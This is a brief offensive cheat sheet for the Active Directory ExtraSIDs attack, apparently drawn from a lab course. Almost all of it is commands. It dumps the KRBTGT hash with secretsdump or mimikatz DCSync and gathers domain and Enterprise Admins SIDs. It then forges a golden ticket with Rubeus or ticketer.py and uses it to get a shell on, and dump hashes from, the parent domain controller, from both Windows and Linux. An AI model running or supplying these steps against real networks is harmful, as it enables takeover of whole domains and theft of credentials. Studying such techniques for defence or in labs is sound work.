ExtraSIDs attack
ExtraSIDs Attack from Windows
Domain Trusts - Child -> Parent. After compromising child domain add admin SID to a user for golden ticket.
Get the KRBTGT hash
# With secretsdump
secretsdump.py htb-[email protected]
# Or mimikatz
lsadump::dcsync /user:LOGISTICS\krbtgt
Get SID of child domain
Get-DomainSID
Get FQDN of child domain
Get-DomainTrust
SID of "Enterprise Admins" group of root domain
Get-DomainGroup -Domain ZENCOROP.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Request Golden Ticket
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:ZEN.ZENCORP.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
ExtraSIDs Attack from Linux
To gather all the information needed.
# Get KRBTGT
secretsdump.py logistics.zencorp.local/[email protected] -just-dc-user zencorp/krbtgt
# Get SID
lookupsid.py logistics.zencorp.local/[email protected]
# Get Enterprise Admins group SID
lookupsid.py logistics.zencorp.local/[email protected]
# Request a ticket with adding admin SID
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain-sid S-1-5-21-2806153819-209893948-922872689 -domain LOGISTICS.ZENCORP.LOCAL -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 mczen
# Connect or Dump hashes
KRB5CCNAME=mczen.ccache smbexec.py -k -no-pass ACADEMY-EA-DC01.ZENCORP.LOCAL
KRB5CCNAME=mczen.ccache secretsdump.py -k -no-pass ACADEMY-EA-DC01.ZENCORP.LOCAL
Last updated
Was this helpful?